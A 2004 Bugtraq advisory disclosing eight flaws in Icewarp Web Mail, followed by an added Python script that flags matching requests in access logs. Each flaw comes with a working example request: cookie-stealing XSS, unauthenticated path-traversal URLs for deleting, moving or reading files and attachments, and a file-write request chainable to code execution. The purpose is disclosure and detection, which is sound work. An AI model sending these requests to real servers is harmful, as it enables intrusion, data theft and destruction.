List: bugtraq
Subject: Multiple vulnerabilities in Icewarp Web Mail 5.2.7
From: ShineShadow <ss_contacts () hotmail ! com>
Date: 2004-09-10 16:30:33
Message-ID: 20040910163033.27745.qmail () www ! securityfocus ! com
ShineShadow Security Report 10092004-01
TITLE: Multiple vulnerabilities in Icewarp Web Mail 5.2.7
BACKGROUND
Merak Mail Server, with the revolutionary Merak Mail Server GroupWare Server,
cutting-edge Merak Mail Server Instant Antispam and much more, is the fastest, most
stable, secure and 100% virus free mail server on the market today. Every day
companies choose Merak Mail Server's stability, speed, security, functionality,
scalability and multi-tiered delegated manageability over products costing thousands
of dollars more yet lacking the sophistication that Merak delivers. In less than 10
minutes you can have the same professional email server that organizations such as
NATO, the U.S. Navy, the FBI, Toyota, the U.S. Government, and many ISP Providers and
Developers depend on every day.
Source: www.MerakMailServer.com (official web-site)
VULNERABLE PRODUCTS
MERAK Mail Server 7.4.5 with Icewarp Web Mail 5.2.7 (earlier versions may also be
vulnerable). MERAK Mail Server 7.5.2 with Icewarp Web Mail 5.2.8 is affected by
vulnerability #5.
DETAILS
1. Multiple cross-site scripting (XSS) vulnerabilities.
Active session required: YES
Description: A remote user who HAS an active session on Merak Mail Server can carry
out a cross-site scripting (XSS) attack. It could be used to execute malicious code in
the web browsers of other users.
Vulnerable pages:
accountsettings.html
search.html
Examples:
http://[targethost]:32000/mail/accountsettings.html->Add->"Account name","Incoming mail server","User name" = <script>alert(document.cookie)</script>
http://[targethost]:32000/mail/search.html->"Search string" = <script>alert(document.cookie)</script>
2. Arbitrary directory creation on target system.
Active session required: NO
Description: A remote user who does NOT have an active session on Merak Mail Server
can create arbitrary directories on the local file system of the target. It could be
used during an attack on an affected system.
Vulnerable pages: viewaction.html
Example:
http://[targethost]:32000/mail/viewaction.html?Move_x=1&user=../../hacker
3. Full install path disclosure.
Active session required: NO
Description: A remote user who does NOT have an active session on Merak Mail Server
can disclose the full install path of Merak Mail Server. It could be used during an
attack on an affected system.
Vulnerable pages:
accountsettings_add.html
topmenu.html
Examples:
http://[target host]:32000/mail/accountsettings_add.html
http://[target host]:32000/mail/topmenu.html
4. Viewing or downloading arbitrary attachments.
Active session required: NO
Description: A remote user who does NOT have an active session on Merak Mail Server
can access the attachments of any user. It could be used to access the personal
information of other users.
Vulnerable pages: attachment.html
Example:
http://[targethost]:32000/mail/attachment.html?user=merakdemo.com/admin&messageid=20040801&index=3&folder=inbox
5. Creating text file with arbitrary content.
Active session required: YES
Description: A remote user who HAS an active session on Merak Mail Server can create
a text file on Merak Mail Server with arbitrary content (including special
characters). The file will be named accounts.dat. By combining this vulnerability with
vulnerability #8, an attacker could execute arbitrary PHP code and take complete
control of an affected system.
Vulnerable pages: accountsettings_add.html
Example:
http://[targethost]:32000/mail/accountsettings_add.html?id=[sessionid]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[any text with special characters]
Note: MERAK Mail Server 7.5.2 with Icewarp Mail Server 5.2.8 is also vulnerable to it.
6. Arbitrary file deletion on target system.
Active session required: NO
Description: A remote user who does NOT have an active session on Merak Mail Server
can delete arbitrary files on the local file system of the target. It could be used to
delete any data on an affected system or to cause denial of service (DoS) conditions.
Vulnerable pages: viewaction.html
Example:
http://[targethost]:32000/mail/viewaction.html?messageid=cmd.exe&action=delete&originalfolder=c:/winnt/system32
7. Moving arbitrary files or directories on target system.
Active session required: NO
Description: A remote user who does NOT have an active session on Merak Mail Server
can move arbitrary files or directories on the local file system of the target. It
could be used to cause denial of service (DoS) conditions or to access arbitrary files
on an affected system.
Vulnerable pages: viewaction.html
Example:
http://[targethost]:32000/mail/viewaction.html?messageid=....//....//config/settings.cfg&Move_x=1&originalfolder=c:/Program%20Files/Merak/html/mail&user=../../html/mail
8. Renaming arbitrary files or directories on target system.
Active session required: YES
Description: A remote user who HAS an active session on Merak Mail Server can rename
arbitrary files or directories on the local file system of the target. Moving files or
directories is also possible. It could be used to cause denial of service (DoS)
conditions or to access arbitrary files on an affected system.
Vulnerable pages: folders.html
Example:
http://[targethost]:32000/mail/folders.html?id=[sessionid]&folderold=....//....//....//….//….//winnt&folder=....//....//....//….//….//linux&Save_x=1
EXPLOITATION
IceWarp Web Mail (CONTROL service) must be running on Merak Mail Server (enabled by
default). Only a web browser is needed to exploit these vulnerabilities.
WORKAROUND
Upgrade to MERAK Mail Server 7.5.2 with Icewarp Web Mail 5.2.8 or higher. Disabling
the Icewarp Web Mail service (Control.exe) is also possible.
VENDOR STATUS
The vendor was contacted on August 6th about these and some other vulnerabilities (not
described in this report). There was no response, but a new version of the product
(MERAK Mail Server 7.5.2 with Icewarp Web Mail 5.2.8) was released on August 12th.
NOT ALL REPORTED VULNERABILITIES HAVE BEEN FIXED IN ICEWARP WEB MAIL 5.2.8.
SUMMARY
An attacker who successfully exploited the vulnerabilities described in this report
could take complete control of a Merak Mail Server 7.4.5 or an affected remote system.
Icewarp Web Mail 5.2.8 is also vulnerable to other critical vulnerabilities (not
described in this report). An attacker who successfully exploited these undescribed
vulnerabilities could take complete control of a Merak Mail Server 7.5.2 or an
affected remote system. I do not advise using this product; you must disable the
Icewarp Web Mail service.
CREDITS
ShineShadow, independent computer security expert.
To get more information, please contact me by e-mail.
10.09.2004
ShineShadow,
ss_contacts@hotmail.com
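
Added example, not part of the original advisory: the request shapes listed under DETAILS can be looked for in web-server access logs covering the /mail/ pages. The combined log format, the constructed sample lines, the function names and the assumption that legitimate webmail requests carry the "id" session parameter are this example's own, not the advisory's.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters that carry file or folder names in the advisory's example requests.
PATH_PARAMS = {"user", "messageid", "originalfolder", "folder", "folderold"}
# Pages the advisory reports as usable without an active session.
NO_SESSION_PAGES = {"viewaction.html", "attachment.html"}
# "../", the doubled "....//" form, backslash variants, or a drive path like "c:/".
TRAVERSAL = re.compile(r"\.\.+[/\\]|^[a-zA-Z]:[/\\]")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def findings(log_line):
    """Return a sorted list of reasons a log line resembles the reported requests."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.startswith("/mail/"):
        return []
    page = url.path.rsplit("/", 1)[-1]
    params = dict(parse_qsl(url.query, keep_blank_values=True))  # values are percent-decoded
    reasons = {f"traversal:{k}" for k, v in params.items()
               if k in PATH_PARAMS and TRAVERSAL.search(v)}
    # Assumption: requests issued by the webmail UI itself carry the session "id" parameter.
    if page in NO_SESSION_PAGES and not params.get("id"):
        reasons.add("no-session")
    return sorted(reasons)

# Constructed sample lines (combined log format), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Sep/2004:16:00:01 +0000] "GET /mail/viewaction.html?Move_x=1&user=../../x HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/Sep/2004:16:00:05 +0000] "GET /mail/folders.html?id=abc123&folderold=....//....//a&folder=b&Save_x=1 HTTP/1.1" 200 734',
    '192.0.2.44 - - [10/Sep/2004:16:01:12 +0000] "GET /mail/attachment.html?id=abc123&messageid=20040801&index=3&folder=inbox HTTP/1.1" 200 20480',
    '192.0.2.10 - - [10/Sep/2004:16:02:40 +0000] "GET /mail/viewaction.html?messageid=a.txt&action=delete&originalfolder=c:%2Ftemp HTTP/1.1" 200 128',
]

def scan(lines):
    """Map the index of each suspicious line to its findings."""
    return {i: f for i, line in enumerate(lines) if (f := findings(line))}

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_LOG).items():
        print(idx, reasons)
```

A "no-session" hit alone only means the request lacked an id parameter; combined with a traversal hit on the same line it matches the unauthenticated file operations in items 2, 6 and 7.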